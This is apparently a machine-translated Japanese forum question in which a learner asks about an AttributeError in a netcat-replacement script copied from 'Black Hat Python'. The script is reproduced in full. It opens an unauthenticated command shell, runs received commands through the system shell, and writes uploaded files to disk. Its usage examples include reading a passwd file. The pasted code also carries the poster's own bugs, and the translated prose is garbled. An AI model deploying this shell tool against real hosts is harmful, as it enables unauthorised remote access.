0
私はこの本を「ブラックハット・パイソン」と呼んでいます。サイバー・セキュリティと分析に焦点を当てていますし、セキュリティ面でも優れています。黒人ハッカーの考え方を知っておくべきだと思います。私は以下のように以下のkali linuxを使用しているnetcatを置き換える
[*] Exception! Exiting.
Traceback (most recent call last):
File "bhnet.py", line 59, in <module>
client.close()
AttributeError: 'module' object has no attribute 'close'
,,本の中で、私はそれを把握するカント何らかの理由で、これは私が受けていますエラーである例では、ストレートの本からのコードです。何が起こっているのかを教えてくれる人がいるでしょうか?それでも私はまだ勉強していませんし、まだ専門家でもないので、説明してもらえます。
import sys, socket, getopt, threading, subprocess
#def some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
client = socket
def usage():
print "bhp net tool"
print
print "usage:bhpnet.py -t target_host -p port"
print "-l --listen -listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run -execute the given file upon - receiving a connection"
print "-c --command -initialize a command shell"
print "-u --upload=destination -upon receiving connection upload a -file and write to [destination]"
print
print
print "examples:"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u =c:\\target.exe"
print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc.passwd\""
print "echo 'python' | ./bhpnet.py -t 192.168.8.135 -p 135"
sys.exit(0)
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
#connect to our target host
client.connect((target,port))
if len(buffer):
client.send(buffer)
while True:
#now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response+= data
if recv_len < 4096:
break
print response,
#wait for more input
buffer = raw_input("")
buffer += "\n"
#send it off
client.send(buffer)
except:
print "[*] Exception! Exiting."
# tear down the connection
client.close()
enterkey()
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target,port))
server.listen(5)
while True:
client.socket, addr = server.accept()
#spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
#trim the newline
command = command.rstrip()
#run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
#send the output back to the client
return output
def client_handler(client_socket):
global upload
global command
global execute
#check for upload
if len(upload_destination):
#read in all of our bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
#check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
#show a simple prompt
client_socket.send("<BHP:#> ")
# now we recive until we see a linefeed
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# send back the command output
response = run_command(cmd_buffer)
#send back the response
client_socket.send(response)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1]):
usage()
#read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", ["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o,a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "unhandled option"
#are we going to listen or just send data from stdin?
if not listen and len(target) and port >0:
#read in the buffer from the commandline
#this is will block, so send ctrl-D if not sending input
#to stdin
buffer = sys.stdin.read()
#send data off
client_sender(buffer)
#are we going to listen and potentially
#upload things, execute commands, and drop a shell back
#depending on our command line options above
if listen:
server_loop()
main()
私は、このコードは、あなたがそれをフォーマットしていないなぜあなたはそれを知っている場合は、ここで –
それを掲示台無ししまっ知っていますか? – goto